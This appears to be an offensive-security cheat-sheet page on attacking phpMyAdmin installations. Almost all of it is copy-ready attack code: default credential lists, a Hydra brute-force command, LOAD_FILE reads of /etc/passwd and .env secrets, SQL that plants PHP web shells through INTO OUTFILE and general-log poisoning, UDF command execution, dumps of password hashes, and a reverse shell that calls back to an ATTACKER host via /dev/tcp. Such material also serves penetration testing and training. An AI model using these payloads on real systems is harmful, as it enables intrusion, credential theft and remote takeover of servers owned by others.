> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# PHPMyAdmin

> PHPMyAdmin attack techniques: default credentials, file read via LOAD_FILE, web shell upload, UDF RCE, and credential extraction.

## Service Detection

Common paths:

```http theme={"dark"}
/phpmyadmin
/phpMyAdmin
/pma
/dbadmin
/mysql
/admin
/sql
```

***

## Default Credentials

```shellscript theme={"dark"}
root:<blank>
root:root
root:toor
admin:admin
mysql:mysql
pma:pma
```

Hydra:

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt TARGET http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:Cannot log in"
```

***

## Version Enumeration

The bottom of the login page usually leaks the version:

```shellscript theme={"dark"}
phpMyAdmin 4.8.1
```

Search exploits:

```bash theme={"dark"}
searchsploit phpmyadmin 4.8
```

***

## Read Files (LFI via MySQL)

Works if MySQL has FILE privilege.

```sql theme={"dark"}
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:/Windows/win.ini');
SELECT LOAD_FILE('/var/www/html/config.php');
```

Dump credentials:

```sql theme={"dark"}
SELECT LOAD_FILE('/var/www/html/.env');
```

***

## Write Web Shell (Linux)

Check web root:

```sql theme={"dark"}
SHOW VARIABLES LIKE "secure_file_priv";
```

If empty → writable anywhere

```sql theme={"dark"}
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
```

Access:

```
http://TARGET/shell.php?cmd=id
```

***

## Write Web Shell (Windows)

```sql theme={"dark"}
SELECT "<HTML><BODY><FORM METHOD=\"GET\" NAME=\"f\"><INPUT TYPE=\"text\" NAME=\"cmd\"><INPUT TYPE=\"submit\"></FORM><pre><?php system($_GET['cmd']); ?></pre></BODY></HTML>"
INTO OUTFILE 'C:\\xampp\\htdocs\\cmd.php';
```

***

## Bypass secure\_file\_priv

Find writable directories:

```sql theme={"dark"}
SHOW VARIABLES LIKE 'datadir';
```

Write inside MySQL folder:

```sql theme={"dark"}
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/lib/mysql/shell.php';
```

Then include via LFI from web app.

***

## Upload Web Shell via Log Poisoning

Write PHP into logs:

```sql theme={"dark"}
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/log.php';
SELECT "<?php system($_GET['cmd']); ?>";
```

***

## Command Execution via UDF (MySQL RCE)

Check privileges:

```sql theme={"dark"}
SELECT user, file_priv, super_priv FROM mysql.user;
```

If FILE + SUPER → full RCE

Upload malicious UDF:

```bash theme={"dark"}
searchsploit mysql udf
```

Then:

```sql theme={"dark"}
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');
```

***

## Dump Password Hashes

```sql theme={"dark"}
SELECT user,host,authentication_string FROM mysql.user;
```

Old MySQL:

```sql theme={"dark"}
SELECT user,password FROM mysql.user;
```

***

## Extract Application Credentials

```sql theme={"dark"}
SHOW DATABASES;
USE wordpress;
SHOW TABLES;
SELECT * FROM wp_users;
```

***

## Reverse Shell

```sql theme={"dark"}
SELECT "<?php system('bash -c \"bash -i >& /dev/tcp/ATTACKER/4444 0>&1\"'); ?>"
INTO OUTFILE '/var/www/html/rev.php';
```

Listener:

```bash theme={"dark"}
nc -lvnp 4444
```
